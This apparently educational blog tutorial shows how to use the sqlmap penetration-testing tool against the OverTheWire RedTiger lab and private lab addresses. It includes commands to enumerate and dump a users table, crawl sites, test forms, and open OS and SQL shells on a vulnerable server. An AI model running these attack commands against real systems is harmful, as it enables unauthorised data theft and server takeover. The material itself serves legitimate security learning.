Last updated on Feb. 28, 2021, 2:09 p.m. by rugved62321
What is sqlmap?
sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester, and a broad range of switches ranging from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.
Functionalities of sqlmap:
To view all the options available in sqlmap use the following:
sqlmap -h     Show basic help message and exit
sqlmap -hh    Show advanced help message and exit
Let's understand the various functionalities by taking a sample hosted website and trying to find its username and password.
To check whether a site is vulnerable, run the most basic and important sqlmap command:
sqlmap -u https://redtiger.labs.overthewire.org/level1.php?cat=1
Using more threads returns results faster, but it also means sending more requests, so there is a chance of a firewall blocking you.
The --threads option lets the user define the number of concurrent requests sqlmap sends, which reduces the overall testing time. It should not be set too high, as that may affect the accuracy of the results.
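The speed/request-count trade-off behind the threads option can be sketched in plain Python. This is only an analogy, not sqlmap's code: `fake_request` and the example URL are hypothetical stand-ins for real HTTP requests.

```python
import time
from concurrent.futures import ThreadPoolExecutor

def fake_request(url):
    """Simulated HTTP request: each one takes ~50 ms."""
    time.sleep(0.05)
    return f"response for {url}"

# Hypothetical test URLs (one per payload sqlmap would try).
urls = [f"http://example.test/page?cat={i}" for i in range(10)]

# Sequential: roughly 10 * 50 ms of wall-clock time.
start = time.time()
for u in urls:
    fake_request(u)
sequential = time.time() - start

# Five concurrent "threads": roughly 2 * 50 ms, but all ten
# requests still hit the server -- which is what a firewall sees.
start = time.time()
with ThreadPoolExecutor(max_workers=5) as pool:
    list(pool.map(fake_request, urls))
concurrent = time.time() - start

print(f"sequential: {sequential:.2f}s, concurrent: {concurrent:.2f}s")
```

The total number of requests is identical in both runs; only the wall-clock time changes, which is why higher thread counts speed up scans but make them noisier.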
Here sqlmap has detected that the database is MySQL, and it asks whether we want to skip tests for other DBMSes. We answer yes, so it only runs tests assuming a MySQL back end, which makes the process faster.
sqlmap will then send several classes of test queries, such as AND/OR boolean-based, error-based, inline queries, and time-based blind queries.
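To make these classes concrete, here is a hedged sketch of what payloads of each type might look like when injected into a parameter whose original value is `1`. The exact strings are illustrative (sqlmap generates many variants); `EXTRACTVALUE` and `SLEEP` are MySQL functions commonly used in error-based and time-based tests.

```python
# Illustrative payloads for the main sqlmap test classes; the
# original parameter value is "1" (as in ?cat=1).
base = "1"

payloads = {
    "AND boolean-based blind": base + " AND 8204=8204",
    "OR boolean-based blind":  base + " OR 1=1",
    "error-based":             base + " AND EXTRACTVALUE(1, CONCAT(0x7e, VERSION()))",
    "inline query":            "(SELECT " + base + ")",
    "time-based blind":        base + " AND SLEEP(5)",
}

for title, payload in payloads.items():
    print(f"{title:24s} cat={payload}")
```

Each class gives sqlmap a different feedback channel: page content for boolean-based tests, error messages for error-based tests, and response delay for time-based tests.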
sqlmap now reports that the first URL parameter is vulnerable, i.e. we can use it to extract data. It also asks whether we want it to test the remaining parameters, but in our case the URL has only a single parameter, "cat".
If our URL were https://redtiger.labs.overthewire.org/level1.php?cat=1&id=2 and we also wanted to check whether "id" is vulnerable, we would answer "Yes" to the above prompt, and sqlmap would repeat the same tests for the second parameter.
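Testing each parameter in turn can be sketched with the standard library: for every parameter in the query string, produce a copy of the URL with a test payload appended to that parameter's value. This is a rough illustration of the idea, not sqlmap's actual implementation.

```python
from urllib.parse import urlsplit, parse_qsl, urlencode, urlunsplit

def injected_urls(url, payload):
    """Yield (parameter, mutated URL) pairs: one URL per parameter,
    with the payload appended to that parameter's value."""
    parts = urlsplit(url)
    params = parse_qsl(parts.query)
    for i, (name, value) in enumerate(params):
        mutated = params.copy()
        mutated[i] = (name, value + payload)
        yield name, urlunsplit(parts._replace(query=urlencode(mutated)))

url = "https://redtiger.labs.overthewire.org/level1.php?cat=1&id=2"
for name, test_url in injected_urls(url, " AND 8204=8204"):
    print(name, "->", test_url)
```

Note that `urlencode` percent-encodes the payload (spaces become `+`, `=` becomes `%3D`), which is also how the payload travels over the wire in a real scan.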
So this is the result of testing. It lists the injection point, the number of requests made, and the type, title and payload of each injection point.
Let's understand what this means:
Consider first result:
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: cat=1 AND 8204=8204
The important part is the payload "cat=1 AND 8204=8204": the URL plus this payload is the injection point. Since 8204=8204 is always true, the page behaves as if cat=1 and the category is displayed: "The hackit is cool...".
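This true/false difference is the entire basis of boolean-based blind injection: by asking yes/no questions and watching whether the category text appears, an attacker can recover data one character at a time. The sketch below simulates that with a toy oracle; `SECRET_DB`, `vulnerable_page` and the `SUBSTR(db,...)` payload shape are all hypothetical stand-ins for the real server and real SQL.

```python
import re
import string

SECRET_DB = "hackit"  # what the server knows and we want to extract

def vulnerable_page(payload):
    """Toy oracle mimicking ?cat=<payload>: returns the category text
    only when the injected condition is true."""
    if payload == "1 AND 8204=8204":
        return "The hackit is cool..."
    # conditions of the form: 1 AND SUBSTR(db,i,1)='c'
    m = re.fullmatch(r"1 AND SUBSTR\(db,(\d+),1\)='(.)'", payload)
    if m and SECRET_DB[int(m.group(1)) - 1 : int(m.group(1))] == m.group(2):
        return "The hackit is cool..."
    return ""

print(vulnerable_page("1 AND 8204=8204"))   # true condition: page shows the category

# Recover the database name one character at a time by asking
# true/false questions and watching whether the category appears.
recovered = ""
for i in range(1, len(SECRET_DB) + 1):
    for c in string.ascii_lowercase:
        if vulnerable_page(f"1 AND SUBSTR(db,{i},1)='{c}'"):
            recovered += c
            break
print(recovered)  # -> hackit
```

sqlmap automates exactly this kind of loop (with smarter bisection over character codes), which is why blind techniques need many more requests than error-based ones.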
--current-user Retrieve DBMS current user
--current-db Retrieve DBMS current database
--tables Enumerate DBMS database tables
Now that we have figured out the database name, let's try to get the table name inside it.
sqlmap -u https://redtiger.labs.overthewire.org/level1.php?cat=1 -D hackit --tables
As we can see, sqlmap could not enumerate the table names directly. A workaround in this situation is that sqlmap falls back to its list of common table names (common-tables.txt) and checks whether any table with a name matching that list exists in the hackit database.
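The wordlist fallback is just dictionary guessing against a yes/no oracle. A minimal sketch, assuming a hypothetical `table_exists` oracle (in a real scan this would be a blind query per guess, e.g. checking whether `SELECT` from the candidate table succeeds) and a tiny stand-in for common-tables.txt:

```python
# Hypothetical oracle: stands in for one boolean-blind request per guess.
EXISTING_TABLES = {"level1_users"}

def table_exists(name):
    return name in EXISTING_TABLES

# Tiny stand-in for sqlmap's bundled common-tables.txt wordlist.
common_tables = ["users", "admin", "accounts", "level1_users", "members"]

found = [t for t in common_tables if table_exists(t)]
print(found)  # -> ['level1_users']
```

The real wordlist is much longer, which is why this step can generate a large burst of requests.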
As we can see, the operation was successful and we have obtained the table name: "level1_users".
sqlmap -u https://redtiger.labs.overthewire.org/level1.php?cat=1 -D hackit -T level1_users --columns
sqlmap -u https://redtiger.labs.overthewire.org/level1.php?cat=1 -D hackit -T level1_users --dump
6) We have the username and password; let's try logging into the website.
--crawl is an important option which allows sqlmap to crawl the website, starting from the root location. The depth to crawl can be defined in the command.
sqlmap -u http://192.168.202.160/ --crawl=1
--crawl: Define a depth to crawl. (Example: defining 2 will allow the tool to crawl up to two directory levels)
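A depth-limited crawl is essentially a breadth-first search over the site's link graph. The sketch below illustrates the idea over a hypothetical site map (the pages, links, and the exclude behavior are assumptions for illustration, not sqlmap's code):

```python
from collections import deque

# Hypothetical site map: page -> links found on that page.
SITE = {
    "/":             ["/cat.php", "/about.php"],
    "/cat.php":      ["/cat.php?id=1", "/logout.php"],
    "/about.php":    [],
    "/cat.php?id=1": [],
    "/logout.php":   ["/"],
}

def crawl(start, max_depth, exclude=None):
    """Breadth-first crawl up to max_depth levels, optionally skipping
    URLs containing the exclude keyword (like --crawl-exclude)."""
    seen, queue, order = {start}, deque([(start, 0)]), []
    while queue:
        url, depth = queue.popleft()
        order.append(url)
        if depth == max_depth:
            continue
        for link in SITE.get(url, []):
            if link in seen or (exclude and exclude in link):
                continue
            seen.add(link)
            queue.append((link, depth + 1))
    return order

print(crawl("/", 1))                    # root plus its direct links
print(crawl("/", 2, exclude="logout"))  # two levels, skipping /logout.php
```

The `exclude` keyword match is deliberately simple (substring test), which mirrors how a keyword like "logout" can knock an entire URL out of scope.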
If we want to exclude any page from the crawler's scope, we can define it with --crawl-exclude. This is a useful option when crawling post-login pages.
sqlmap -u http://192.168.202.163/ --crawl=3 --cookie="cookie value" --crawl-exclude="logout"
This command will crawl the website up to three directory levels and exclude any URL containing the "logout" keyword. As you can see below, sqlmap has crawled the website but excluded the logout URL.
Let's run the same command without the --crawl-exclude option:
As seen below, when --crawl-exclude is not defined, sqlmap crawls the logout URL. This invalidates the existing session (due to the logout) and prevents the scan from completing.
The --batch option is used for non-interactive sessions. While scanning, sqlmap may ask us to provide input: for example, when using the crawl feature, the tool asks whether the user wants to scan each identified URL. When --batch is specified in the command, the tool proceeds with the default answer instead of prompting the user.
A page URL containing a form (say, a login page) can be provided along with the --form option; sqlmap then parses the page and guides the user through testing the identified fields.
Pages with a large number of form fields can be tested effectively by combining the --form and --batch options: sqlmap parses the page, detects the form fields, and automatically supplies the input on behalf of the user.
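The form-parsing step can be sketched with the standard library's HTML parser: collect the names of the `<input>` fields, since those names become the injectable parameters. The login page HTML below is hypothetical, and this is a rough illustration rather than sqlmap's actual parser.

```python
from html.parser import HTMLParser

class FormFieldParser(HTMLParser):
    """Collects the names of <input> fields on a page -- a rough
    sketch of the parsing step behind the --form option."""
    def __init__(self):
        super().__init__()
        self.fields = []

    def handle_starttag(self, tag, attrs):
        if tag == "input":
            attrs = dict(attrs)
            if "name" in attrs:
                self.fields.append(attrs["name"])

# Hypothetical login page.
html = """
<form action="login.php" method="post">
  <input type="text" name="username">
  <input type="password" name="password">
  <input type="submit" value="Login">
</form>
"""

parser = FormFieldParser()
parser.feed(html)
print(parser.fields)  # -> ['username', 'password']
```

Each named field found this way is a candidate injection point; with --batch, sqlmap tests them without stopping to ask about each one.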
If the entire application has to be scanned, the --crawl option can be used along with the --form and --batch switches.
In case we want to see the payloads being sent by the tool, we can use the verbosity option -v. The values range from 0 to 6.
We can run OS/system-level commands if the current database user has DBA rights, using the following options:
For a Linux server:
sqlmap -u http://192.168.202.162/cat.php?id=1 --os-shell
For a Windows server:
sqlmap -u http://192.168.202.162/cat.php?id=1 --os-cmd <cmd>
We can run SQL statements directly on the database with the following command:
sqlmap -u 192.168.202.164/cat.php?id=2 --sql-shell